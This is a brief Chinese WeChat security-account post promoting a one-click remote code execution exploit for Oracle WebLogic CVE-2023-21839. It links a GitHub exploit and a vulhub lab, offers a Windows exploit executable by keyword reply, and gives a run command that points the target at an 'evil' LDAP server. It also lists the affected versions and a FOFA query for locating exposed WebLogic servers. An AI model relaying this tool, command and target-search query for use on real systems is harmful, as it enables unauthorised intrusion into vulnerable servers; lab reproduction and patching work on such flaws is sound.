在推送群里的应该早就看到了!
没啥发的了
简单粗暴
https://github.com/4ra1n/CVE-2023-21839
无需 Java 依赖,构造协议通过socket直接RCE
windows EXP:CVE-2023-21839.exe
后台回复CVE-2023-21839获取
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
vulhub地址
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
漏洞影响范围
Weblogic 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
FOFA Query
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
原文始发于微信公众号(浪飒sec):【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论